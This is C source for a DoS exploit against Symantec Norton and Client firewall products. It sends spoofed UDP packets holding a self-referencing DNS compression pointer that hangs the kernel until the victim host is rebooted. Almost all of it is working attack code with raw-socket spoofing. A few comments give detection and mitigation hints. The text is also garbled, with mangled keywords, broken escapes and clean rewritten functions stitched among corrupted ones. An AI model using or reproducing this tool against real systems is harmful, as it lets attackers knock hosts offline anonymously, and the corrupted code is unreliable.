Symantec firewall DoS attack code


Author: houseofdabus
Name: HOD-symantec-firewall-DoS-expl.c:
Version: version 0.1 coded by houseofdabus
Translation: luoluo
Vulnerability discovery: www.eeye.com
Vulnerability Description: http://www.eeye.com/html/Research/Advisories/AD20040512B.html

*-------------------------------------------------------------------
* Program test:
*-Symantec Norton Personal Firewall 2004

* Affected products:
*-Symantec Norton Internet Security 2002
*-Symantec Norton Internet Security 2003
*-Symantec Norton Internet Security 2004
*-Symantec Norton Internet Security Professional 2002
*-Symantec Norton Internet Security Professional 2003
*-Symantec Norton Internet Security Professional 2004
*-Symantec Norton Personal Firewall 2002
*-Symantec Norton Personal Firewall 2003
*-Symantec Norton Personal Firewall 2004
*-Symantec Client Firewall 5.01, 5.1.1
*-Symantec Client Security 1.0, 1.1, 2.0 (SCF 7.1)
*-Symantec Norton AntiSpam 2004

*-------------------------------------------------------------------
* Note:
eEye Digital Security has discovered a second security vulnerability in the Symantec firewall product line. The vulnerability can be detected and exploited remotely to launch a DoS attack against affected systems. By sending a single malicious DNS (UDP port 53) response packet to a vulnerable host, an attacker can cause Symantec's DNS response validation code to enter an endless loop in the kernel until the system crashes. The attacked host can resume operation only after a physical restart.

*-------------------------------------------------------------------
* Compilation:
* Win32/VC ++: CL-O hod-sym-dos-expl HOD-sym-DoS-expl.c ws2_32.lib
* Win32/cygwin: gcc-O hod-sym-dos-expl HOD-sym-DoS-expl.c-lws2_32.lib
* Linux: gcc-O hod-sym-dos-expl HOD-sym-DoS-expl.c-wall

*-------------------------------------------------------------------
* Command line parameters/descriptions:

* Hod-Symantec-firewall-dos-expl [-fi: Str] [-TP: int] [-Ti: Str] [-N: int]

*-Fi: IP from (sender) IP Address
*-TP: int to (recipient) Port Number
*-Ti: IP to (recipient) IP Address
*-N: int number of times to send message
*
*/

# Ifdef _ Win32
# Pragma comment (Lib, "ws2_32 ")
# Pragma pack (1)
# Define win32_lean_and_mean
# Include <winsock2.h>
# Include <ws2tcpip. h>/* ip_hdrincl */
# Include <stdio. h>
# Include <stdlib. h>

# Else
# Include <sys/types. h>
# Include <netinet/in. h>
# Include <sys/socket. h>
# Include <stdio. h>
# Include <stdlib. h>
# Include <ARPA/inet. h>
# Include <netdb. h>
# Include <sys/timeb. h>
# Include <string. h>
# Endif

# Deprecision max_message 4068
# Define max_packet 4096

# Define default_port 53
# Define default_ip "10.0.0.1"
# Define default_count 1

# Ifndef _ Win32
# Define far
# Endif

/* DNS payload: a 14-byte "response" whose only name is a compression
 * pointer to itself. RFC 1035 section 4.1.4 allows a pointer only to a
 * *prior* occurrence of a name; a parser that follows pointers without a
 * hop limit or a backwards-only check never terminates on this name. That
 * is the whole trigger described in the eEye advisory above, and bounding
 * pointer chasing is the parser-side mitigation.
 * Detection hint: a DNS reply (flags 0x8000) with QDCOUNT=1, ANCOUNT=1
 * and a 14-byte UDP payload whose question name is 0xC00C.
 * Rendering note: the "/X.." below are this page's mangling of C "\x.."
 * hex escapes. */
Char dnsreply [] =
"/Xc9/x9c"/* transaction ID */
"/X80/x00"/* flags: bit 15 set = response (QR) */
"/X00/x01"/* QDCOUNT: number of questions */
"/X00/x01"/* ANCOUNT: number of answer RRs */
"/X00/x00"/* NSCOUNT: number of authority RRs */
"/X00/x00"/* ARCOUNT: number of additional RRs */
"/Xc0/x0c";/* name = compression pointer 0xC00C -> offset 12, i.e. this byte pair itself */

/* IPv4 header as laid out on the wire (RFC 791 field order, no options).
 * main() fills every multi-byte field with htons()/inet_addr() results,
 * i.e. network byte order, and copies the struct verbatim into the
 * packet buffer. #pragma pack(1) is applied only under _Win32 (see the
 * include block); elsewhere every field already sits at a naturally
 * aligned offset, so the struct should still be 20 bytes -- confirm with
 * sizeof before relying on it. */
Typedef struct ip_hdr {
Unsigned char ip_verlen;/* version (high nibble) | header length in 32-bit words (low nibble) */
Unsigned char ip_tos;/* IP type of service */
Unsigned short ip_totallength;/* total length, network order */
Unsigned short ip_id;/* identification */
Unsigned short ip_offset;/* flags + fragment offset */
Unsigned char ip_ttl;/* time to live */
Unsigned char ip_protocol;/* protocol (0x11 = UDP) */
Unsigned short ip_checksum;/* IP checksum; main() leaves it 0 for the stack to fill -- presumably, confirm per platform */
Unsigned int ip_srcaddr;/* source address; written from dwfromip, so attacker-chosen (spoofed) -- BCP 38 egress filtering is the network-side mitigation */
Unsigned int ip_destaddr;/* destination address, network order */
} Ip_hdr, * pip_hdr, far * lpip_hdr;/* `far` expands to nothing outside _Win32 (see above); presumably a legacy 16-bit Windows qualifier -- verify */

/* UDP header (RFC 768), 8 bytes, all fields network byte order.
 * main() computes udp_checksum over the IPv4 pseudo-header + this header
 * + payload and stores it without htons(), because the checksum is
 * computed over the already network-ordered bytes. */
Typedef struct udp_hdr {
Unsigned short src_portno;/* source port (spoofed, from ifromport) */
Unsigned short dst_portno;/* destination port (from itoport) */
Unsigned short udp_length;/* header + payload length */
Unsigned short udp_checksum;/* optional for IPv4 (0 = none); filled in by main() */
} Udp_hdr, * pudp_hdr;

/* Globals shared between validateargs() and main().
 * Addresses hold inet_addr() results (network byte order); ports are in
 * host order and are htons()'d when the UDP header is built. */
Unsigned long dwtoip, // destination IPv4 address (inet_addr result)
Dwfromip; // source IPv4 address to claim in the IP header (spoofed)
Unsigned short itoport, // destination UDP port, host order
Ifromport; // source UDP port, host order (default_port = 53)
Unsigned long dwcount; // number of datagrams to send (loop bound in main)
Char strmessage [max_message]; // UDP payload; seeded from dnsreply (14 bytes), capacity max_message

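/*
 * usage - print the command-line synopsis to stdout and exit(1).
 *
 * progname: argv[0] as passed by the caller; only used in the synopsis.
 * Never returns. Both main() and validateargs() rely on that, so the
 * exit() must stay.
 *
 * The page's rendering had mangled the escapes ("/n", "% S"); they are
 * restored here as "\n" and "%s".
 */
void
usage(const char *progname)
{
    printf("Usage:\n");
    printf("%s <-fi:SRC-IP> <-ti:VICTIM-IP> [-tp:DST-PORT] [-n:int]\n", progname);
    printf("-fi:IP   from (sender) IP Address\n");
    printf("-tp:int  to (recipient) open UDP port number:\n");
    printf("137,138,445,500 (default)\n");
    printf("-ti:IP   to (recipient) IP Address\n");
    printf("-n:int   number of times\n");
    exit(1);
}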

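/* Value part of a "-xy:value" option, or "" when nothing follows the prefix. */
static const char *
opt_value(const char *arg, size_t prefix_len)
{
    return strlen(arg) > prefix_len ? arg + prefix_len : "";
}

/*
 * parse_addr - dotted-quad IPv4 address via inet_addr().
 * Calls usage() (which does not return) on an empty value or when
 * inet_addr() rejects the text (INADDR_NONE). Side effect of that check:
 * 255.255.255.255 cannot be given, since inet_addr() reports it as
 * INADDR_NONE too.
 */
static unsigned long
parse_addr(const char *s, char *progname)
{
    unsigned long a = (unsigned long)INADDR_NONE;
    if (*s == '\0')
        usage(progname);
    a = inet_addr(s);
    if (a == (unsigned long)INADDR_NONE)
        usage(progname);
    return a;
}

/*
 * parse_number - unsigned decimal via strtoul().
 * Calls usage() on an empty value, a leading sign, or trailing junk
 * (atoi()/atol() in the original silently accepted all of those).
 * On overflow strtoul() returns ULONG_MAX, which the port range check
 * in validateargs() rejects.
 */
static unsigned long
parse_number(const char *s, char *progname)
{
    char *end = NULL;
    unsigned long v = strtoul(s, &end, 10);
    if (*s < '0' || *s > '9' || *end != '\0')
        usage(progname);
    return v;
}

/*
 * validateargs - set the packet globals from the command line.
 *
 * Options (letter case ignored, '-' or '/' prefix; the ':' separator is
 * not verified, matching the original):
 *   -fi:<ip>    source (spoofed) IPv4 address  -> dwfromip
 *   -ti:<ip>    destination IPv4 address       -> dwtoip
 *   -tp:<port>  destination UDP port 1..65535  -> itoport
 *   -n:<count>  number of datagrams to send    -> dwcount
 * Defaults: itoport 500, ifromport default_port, both addresses
 * default_ip, dwcount default_count; strmessage is seeded with dnsreply.
 * Arguments that do not start with '-' or '/' are ignored, as before.
 *
 * Any unknown option, missing value, unparsable number, out-of-range
 * port or address rejected by inet_addr() ends the program through
 * usage(). The original comparison on argv[i][0] was rendered with '='
 * (assignment) on this page; it is an equality test here.
 */
void
validateargs(int argc, char **argv)
{
    itoport = 500;
    ifromport = default_port;
    dwtoip = inet_addr(default_ip);
    dwfromip = inet_addr(default_ip);
    dwcount = default_count;
    memcpy(strmessage, dnsreply, sizeof(dnsreply) - 1);

    for (int i = 1; i < argc; i++) {
        const char *arg = argv[i];

        if (arg[0] != '-' && arg[0] != '/')
            continue;

        /* arg[1] / arg[2] may be the terminator; that falls to usage(). */
        switch (arg[1]) {
        case 'f': case 'F':
            if (arg[2] == 'i' || arg[2] == 'I')
                dwfromip = parse_addr(opt_value(arg, 4), argv[0]);
            else
                usage(argv[0]);
            break;
        case 't': case 'T':
            if (arg[2] == 'p' || arg[2] == 'P') {
                unsigned long port = parse_number(opt_value(arg, 4), argv[0]);
                /* atoi() used to truncate silently into unsigned short. */
                if (port < 1 || port > 65535)
                    usage(argv[0]);
                itoport = (unsigned short)port;
            } else if (arg[2] == 'i' || arg[2] == 'I') {
                dwtoip = parse_addr(opt_value(arg, 4), argv[0]);
            } else {
                usage(argv[0]);
            }
            break;
        case 'n': case 'N':
            dwcount = parse_number(opt_value(arg, 3), argv[0]);
            break;
        default:
            usage(argv[0]);
            break;
        }
    }
}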

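/*
 * checksum - RFC 1071 16-bit one's complement sum of `size` bytes at
 * `buffer`, returned complemented.
 *
 * Words are read with memcpy(), so the buffer need not be 2-byte aligned
 * (main() passes a char[]) and no strict-aliasing rule is broken. A
 * trailing odd byte is treated as the first byte of a zero-padded word,
 * as the RFC specifies; the original added it as a plain integer, which
 * is only correct on little-endian hosts. The result has the same byte
 * order as the input, so main() stores it into udp_checksum without
 * htons().
 *
 * buffer: bytes to sum (may be NULL when size <= 0)
 * size:   byte count; size <= 0 yields 0xFFFF (complement of an empty sum)
 */
unsigned short
checksum(const unsigned short *buffer, int size)
{
    const unsigned char *p = (const unsigned char *)buffer;
    unsigned long sum = 0;
    size_t left = size > 0 ? (size_t)size : 0;

    while (left > 1) {
        unsigned short word;
        memcpy(&word, p, sizeof word);
        sum += word;
        p += sizeof word;
        left -= sizeof word;
    }
    if (left == 1) {
        /* Odd byte occupies the first byte of a zero-padded word on
         * either endianness, matching the RFC padding rule. */
        unsigned short word = 0;
        memcpy(&word, p, 1);
        sum += word;
    }
    /* Fold twice: the first fold can itself carry out of bit 15. */
    sum = (sum >> 16) + (sum & 0xFFFF);
    sum += (sum >> 16);

    return (unsigned short)(~sum);
}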

/*
 * main - build one spoofed IPv4/UDP datagram carrying dnsreply and send
 * it dwcount times through a raw socket with IP_HDRINCL.
 *
 * Flow: banner -> validateargs() -> (Win32) WSAStartup -> raw socket ->
 * IP_HDRINCL -> fill ip_hdr/udp_hdr -> UDP checksum over the pseudo-header
 * -> assemble packet -> sendto() loop.
 *
 * NOTE(review): socket(), setsockopt() and sendto() results are checked
 * only inside the _Win32 branches; the non-Win32 path proceeds with S == -1
 * and prints whatever sendto() returned. A raw socket presumably needs
 * administrator/root privileges -- nothing here checks for that.
 * NOTE(review): the "[*] Count" printf formats dwcount (unsigned long)
 * with %d; the matching specifier is %lu.
 */
Int
Main (INT argc, char ** argv)
{
# Ifdef _ Win32
Wsadata WSD;
# Endif
Int S;/* raw socket descriptor */
# Ifdef _ Win32
Bool bopt;
# Else
Int bopt;
# Endif
Struct sockaddr_in remote;/* sendto() destination */
Ip_hdr iphdr;
Udp_hdr udphdr;
Int ret;
Unsigned long I;
Unsigned short itotalsize,/* IP total length: ip + udp + 14-byte payload */
Iudpsize,/* UDP length: udp header + payload */
Iudpchecksumsize,/* bytes covered by the UDP checksum (pseudo-header + udp + payload) */
Iipversion,
Iipsize,/* IP header length in 32-bit words */
Cksum = 0;
Char Buf [max_packet],/* scratch buffer, reused: first the checksum image, then the datagram */
* PTR = NULL;
# Ifdef _ Win32
In_addr ADDR;/* only for inet_ntoa() in the banner */
# Else
Struct sockaddr_in ADDR;/* only for inet_ntoa(ADDR.sin_addr) in the banner */
# Endif

Printf ("/nsymantec Multiple Firewall DNS Response Denial-of-Service exploit v0.1/N ");
Printf ("bug discoveried by eeye:/N ");
Printf ("http://www.eeye.com/html/Research/Advisories/AD20040512B.html/n/n ");
Printf ("--- coded by.: [houseofdabus]:. ---/n ");

If (argc <3) usage (argv [0]);

/* Parse command line arguments and print them out */
Validateargs (argc, argv );
# Ifdef _ Win32
ADDR. s_un.s_addr = dwfromip;
Printf ("[*] from IP: <% S>, Port: % d/N", inet_ntoa (ADDR), ifromport );
ADDR. s_un.s_addr = dwtoip;
Printf ("[*] to IP: <% S>, Port: % d/N", inet_ntoa (ADDR), itoport );
Printf ("[*] Count: % d/N", dwcount );/* NOTE(review): %d with unsigned long; should be %lu */
# Else
ADDR. sin_addr.s_addr = dwfromip;
Printf ("[*] from IP: <% S>, Port: % d/N", inet_ntoa (ADDR. sin_addr), ifromport );
ADDR. sin_addr.s_addr = dwtoip;
Printf ("[*] to IP: <% S>, Port: % d/N", inet_ntoa (ADDR. sin_addr), itoport );
Printf ("[*] Count: % d/N", dwcount );/* NOTE(review): %d with unsigned long; should be %lu */
# Endif

# Ifdef _ Win32
If (wsastartup (makeword (2, 2), & WSD )! = 0 ){
Printf ("[-] wsastartup () failed: % d/N", getlasterror ());
Return-1;
}
# Endif
/* Create a raw socket; the kernel will not build the IP header for us once IP_HDRINCL is set below */
S = socket (af_inet, sock_raw, ipproto_udp );
# Ifdef _ Win32
If (S = invalid_socket ){
Printf ("[-] wsasocket () failed: % d/N", wsagetlasterror ());
Return-1;
}
# Endif
/* NOTE(review): no failure check on the non-Win32 path; S may be -1 here */

/* Enable the IP header include option: the caller supplies the IPv4 header, which is what lets ip_srcaddr be spoofed */
# Ifdef _ Win32
Bopt = true;
# Else
Bopt = 1;
# Endif
Ret = setsockopt (S, ipproto_ip, ip_hdrincl, (char *) & bopt, sizeof (bopt ));
# Ifdef _ Win32
If (ret = socket_error ){
Printf ("[-] setsockopt (ip_hdrincl) failed: % d/N", wsagetlasterror ());
Return-1;
}
# Endif
/* NOTE(review): ret is not checked on the non-Win32 path */
/* Initialize the IP header */
Itotalsize = sizeof (iphdr) + sizeof (udphdr) + sizeof (dnsreply)-1;/* -1 drops the string terminator */

Iipversion = 4;
Iipsize = sizeof (iphdr)/sizeof (unsigned long );

Iphdr. ip_verlen = (iipversion <4) | iipsize;/* version in the high nibble, header length in words in the low nibble ("<4" is the page's rendering of "<< 4") */
Iphdr. ip_tos = 0;/* IP type of service */
Iphdr. ip_totallength = htons (itotalsize);/* Total Packet Len */
Iphdr. ip_id = 0;/* identification: fixed 0 -- a constant ID on every datagram is itself a signature worth noting for detection */
Iphdr. ip_offset = 0;/* Fragment offset field */
Iphdr. ip_ttl = 128;/* Time to live */
Iphdr. ip_protocol = 0x11;/* protocol (UDP )*/
Iphdr. ip_checksum = 0;/* IP checksum left 0 -- presumably filled by the stack; confirm per platform */
Iphdr. ip_srcaddr = dwfromip;/* Source Address (attacker-chosen; this is the spoofed field) */
Iphdr. ip_destaddr = dwtoip;/* Destination Address */

/* Initialize the UDP header */
Iudpsize = sizeof (udphdr) + sizeof (dnsreply)-1;

Udphdr. src_portno = htons (ifromport );
Udphdr. dst_portno = htons (itoport );
Udphdr. udp_length = htons (iudpsize );
Udphdr. udp_checksum = 0;/* must be 0 while the checksum is computed */

/* Build the RFC 768 checksum image in Buf: pseudo-header (src, dst, zero, proto, udp length), then the UDP header, then the payload */
Iudpchecksumsize = 0;
PTR = Buf;
Memset (BUF, 0, max_packet );

Memcpy (PTR, & iphdr. ip_srcaddr, sizeof (iphdr. ip_srcaddr ));
PTR + = sizeof (iphdr. ip_srcaddr );
Iudpchecksumsize + = sizeof (iphdr. ip_srcaddr );

Memcpy (PTR, & iphdr. ip_destaddr, sizeof (iphdr. ip_destaddr ));
PTR + = sizeof (iphdr. ip_destaddr );
Iudpchecksumsize + = sizeof (iphdr. ip_destaddr );

PTR ++;/* the pseudo-header's zero byte; Buf was memset to 0 above */
Iudpchecksumsize + = 1;

Memcpy (PTR, & iphdr. ip_protocol, sizeof (iphdr. ip_protocol ));
PTR + = sizeof (iphdr. ip_protocol );
Iudpchecksumsize + = sizeof (iphdr. ip_protocol );

Memcpy (PTR, & udphdr. udp_length, sizeof (udphdr. udp_length ));
PTR + = sizeof (udphdr. udp_length );
Iudpchecksumsize + = sizeof (udphdr. udp_length );

Memcpy (PTR, & udphdr, sizeof (udphdr ));
PTR + = sizeof (udphdr );
Iudpchecksumsize + = sizeof (udphdr );

For (I = 0; I <sizeof (dnsreply)-1; I ++, PTR ++)
* PTR = strmessage [I];/* payload: the 14 bytes validateargs() copied from dnsreply */
Iudpchecksumsize + = sizeof (dnsreply)-1;

Cksum = checksum (unsigned short *) BUF, iudpchecksumsize );
Udphdr. udp_checksum = cksum;/* no htons(): the sum was taken over network-ordered bytes */

/* Reuse Buf for the datagram itself: IP header, UDP header, payload */
Memset (BUF, 0, max_packet );
PTR = Buf;

Memcpy (PTR, & iphdr, sizeof (iphdr); PTR + = sizeof (iphdr );
Memcpy (PTR, & udphdr, sizeof (udphdr); PTR + = sizeof (udphdr );
Memcpy (PTR, strmessage, sizeof (dnsreply)-1 );

Remote. sin_family = af_inet;
Remote. sin_port = htons (itoport );
Remote. sin_addr.s_addr = dwtoip;

For (I = 0; I <dwcount; I ++ ){
# Ifdef _ Win32
Ret = sendto (S, Buf, itotalsize, 0, (sockaddr *) & remote,
Sizeof (remote ));

If (ret = socket_error ){
Printf ("[-] sendto () failed: % d/N", wsagetlasterror ());
Break;
} Else
# Else
Ret = sendto (S, Buf, itotalsize, 0, (struct sockaddr *) & remote,
Sizeof (remote ));
# Endif
Printf ("[+] sent % d Bytes/N", RET );/* NOTE(review): on non-Win32 a -1 from sendto() is printed as "sent -1 Bytes" rather than handled */
}

# Ifdef _ Win32
Closesocket (s );
Wsacleanup ();
# Endif
/* NOTE(review): the non-Win32 path never close()s S; harmless at exit but inconsistent with the Win32 branch */

Return 0;
}
